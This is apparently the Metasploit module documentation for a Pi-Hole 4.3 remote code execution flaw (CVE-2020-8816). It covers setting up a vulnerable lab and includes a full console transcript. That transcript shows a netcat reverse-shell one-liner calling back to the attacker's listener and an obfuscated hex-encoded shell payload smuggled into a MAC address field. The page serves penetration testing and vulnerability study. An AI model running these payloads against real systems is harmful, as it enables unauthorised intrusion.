## Vulnerable Application

This exploits a command execution in Pi-Hole <= 4.3.2. A new DHCP
static lease is added with a MAC address which includes an RCE.
DHCP server is not required to be running.

Exploitation has many constraints, outlined in the original
[technical writeup](https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/).

1. Exploitation requires `/opt/pihole` to be first in the `$PATH` due to
exploitation constraints.
2. Payload must not contain `%00`
3. Payload must be all capital letters

### Setup

Install Pi-Hole [Pi-Hole 4.3](https://github.com/pi-hole/pi-hole/releases/tag/v4.3)
with the following commands:

  ```
  sudo git clone --depth=1 -b v4.3 https://github.com/pi-hole/pi-hole.git /etc/.pihole
  # replace 'git clone' with 'git clone -b v4.3'
  sudo nano /etc/.pihole/automated\ install/basic-install.sh
  sudo ./basic-install.sh
  ```

Pi-Hole attempts to install the latest versions of the software.  Modifying the git clone
command will force it to install the old AdminLTE and Pi-Hole versions.  However this
will make FTL fail to install.

Answer everything with the default.

Lastly, we need to create one file which wasn't made.

```
sudo touch /etc/pihole/GitHubVersions
```

If `/opt/pihole` isn't in the path (for php/lighttp) because the install process wasn't 100% due
to the forcing of version 4.3, edit `/etc/lighttpd/conf-available/15-fastcgi-php.conf` and
add a new item to bin-environment.

```
"PATH" => "opt/pihole:" + env.PATH
```

This will be enough to make it exploitable, however the dashboard won't fully work since some
other components were installed which are too new for it to work with.

If you wish to install FTL, follow the [directions](https://docs.pi-hole.net/ftldns/compile/).

### Setup (docker)

```
$ cat docker-compose.yml
version: "3"

# More info at https://github.com/pi-hole/docker-pi-hole/ and https://docs.pi-hole.net/
services:
  pihole:
    container_name: pihole
    image: pihole/pihole:4.3
    ports:
#      - "53:53/tcp"
#      - "53:53/udp"
#      - "67:67/udp"
      - "80:80/tcp"
#      - "443:443/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: 'password123'
    # Volumes store your data between container upgrades
    #volumes:
    #   - './etc-pihole/:/etc/pihole/'
    #   - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
    dns:
      - 127.0.0.1
      - 1.1.1.1
    # Recommended but not required (DHCP needs NET_ADMIN)
    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
    cap_add:
      - NET_ADMIN
    restart: unless-stopped
```

### Cleanup

This will attempt to clean entries in `/etc/dnsmasq.d/04-pihole-static-dhcp.conf`.
However, on failure, `sudo pihole -a removestaticdhcp <MAC>` can be used to remove them.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/unix/http/pihole_dhcp_mac_exec```
  4. Do: ```set rhosts```
  4. Do: ```run```
  5. You should get a shell.

## Options

### Password

Password for the web interface.  Randomly set on install.  Use `pihole -a -p` to change/remove it.

## Scenarios

### Pi-Hole 4.3 with AdminLTE 4.3 on Ubuntu 18.04

  ```
  msf5 > use exploit/unix/http/pihole_dhcp_mac_exec
  [*] Using exploit/unix/http/pihole_dhcp_mac_exec
  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set rhosts 2.2.2.2
  rhosts => 2.2.2.2
  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 1.1.1.1
  lhost => 1.1.1.1
  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lport 8888
  lport => 8888
  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set password password123
  password => password123
  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set verbose true
  verbose => true
  msf5 exploit(unix/http/pihole_dhcp_mac_exec) > run
  
  [+] mkfifo /tmp/wvfacoc; nc 1.1.1.1 8888 0</tmp/wvfacoc | /bin/sh >/tmp/wvfacoc 2>&1; rm /tmp/wvfacoc
  [*] Started reverse TCP handler on 1.1.1.1:8888 
  [+] Version Detected: 4.3
  [*] Using cookie: PHPSESSID=4ce3tjd269lcut95orff4a45l8;
  [*] Login required, attempting login.
  [*] Using token: czTyD7HbrcwZfTS7gJg4xgxSkB/CjGNlJPTUueA0ACk=
  [*] Validating path with MAC: 8D540FBF0F5F
  [+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  [*] Payload MAC will be: 818CC59E2B82
  [*] Shellcode: 818CC59E2B82&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("2f62696e2f6563686f202d6e6520275c7836645c7836625c7836365c7836395c7836365c7836665c7832305c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c7836325c7833625c7832305c7836655c7836335c7832305c7833315c7833395c7833325c7832655c7833315c7833365c7833385c7832655c7833325c7832655c7833315c7833395c7833395c7832305c7833385c7833385c7833385c7833385c7832305c7833305c7833635c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c7836325c7832305c7837635c7832305c7832665c7836325c7836395c7836655c7832665c7837335c7836385c7832305c7833655c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c7836325c7832305c7833325c7833655c7832365c7833315c7833625c7832305c7837325c7836645c7832305c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c783632277c7368"));'&&
  [*] Sending Exploit
  [*] Command shell session 1 opened (1.1.1.1:8888 -> 2.2.2.2:40226) at 2020-05-28 09:50:18 -0400
  [*] Attempting to clean 8D540FBF0F5F from config
  [*] Attempting to clean 818CC59E2B82 from config
  
  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  uname -a
  Linux ubuntu1804 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
  cat /etc/os-release
  NAME="Ubuntu"
  VERSION="18.04 LTS (Bionic Beaver)"
  ID=ubuntu
  ID_LIKE=debian
  PRETTY_NAME="Ubuntu 18.04 LTS"
  VERSION_ID="18.04"
  HOME_URL="https://www.ubuntu.com/"
  SUPPORT_URL="https://help.ubuntu.com/"
  BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
  PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
  VERSION_CODENAME=bionic
  UBUNTU_CODENAME=bionic
  ```
